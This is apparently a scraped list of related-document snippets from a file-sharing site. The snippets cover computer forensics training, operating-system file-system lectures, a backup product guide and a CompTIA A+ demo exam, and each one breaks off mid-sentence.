This advanced five-day course provides the knowledge and skills necessary to install, configure and effectively use Forensic Toolkit (FTK ), FTK Imager Password Recovery Toolkit (PRTK ) and Registry Viewer.
More informationRicardo Rocha. Department of Computer Science Faculty of Sciences University of Porto
Ricardo Rocha Department of Computer Science Faculty of Sciences University of Porto Slides based on the book Operating System Concepts, 9th Edition, Abraham Silberschatz, Peter B. Galvin and Greg Gagne,
More informationChapter 12: File System Implementation
Chapter 12: File System Implementation Silberschatz, Galvin and Gagne 2013 Chapter 12: File System Implementation File-System Structure File-System Implementation Allocation Methods Free-Space Management
More informationFile Systems Management and Examples
File Systems Management and Examples Today! Efficiency, performance, recovery! Examples Next! Distributed systems Disk space management! Once decided to store a file as sequence of blocks What s the size
More informationACRONIS TRUE IMAGE 11 HOME REVIEWER S GUIDE
ACRONIS TRUE IMAGE 11 HOME REVIEWER S GUIDE Acronis True Image 11.0 Home provides the maximum flexibility to ensure you are adequately protected and can recover from unforeseen events such as viruses,
More informationVendor: CompTIA. Exam Code: Exam Name: CompTIA A+ Certification Exam (902) Version: Demo
Vendor: CompTIA Exam Code: 220-902 Exam Name: CompTIA A+ Certification Exam (902) Version: Demo DEMO QUESTION 1 Which of the following best practices is used to fix a zero-day vulnerability on Linux? A.
More informationAdvanced Operating Systems
Advanced Operating Systems File Systems: File Allocation Table, Linux File System, NTFS Lecture 10 Case Studies of File Systems File Allocation Table (FAT) Unix File System Berkeley Fast File System Linux
More informationCS307: Operating Systems
CS307: Operating Systems Chentao Wu 吴晨涛 Associate Professor Dept. of Computer Science and Engineering Shanghai Jiao Tong University SEIEE Building 3-513 wuct@cs.sjtu.edu.cn Download Lectures ftp://public.sjtu.edu.cn
More informationIntroduction to Computer Forensics
Introduction to Computer Forensics Subrahmani Babu Scientist- C, Computer Forensic Laboratory Indian Computer Emergency Response Team (CERT-In) Department of Information Technology, Govt of India. babu_sivakami@cert-in.org.in
More information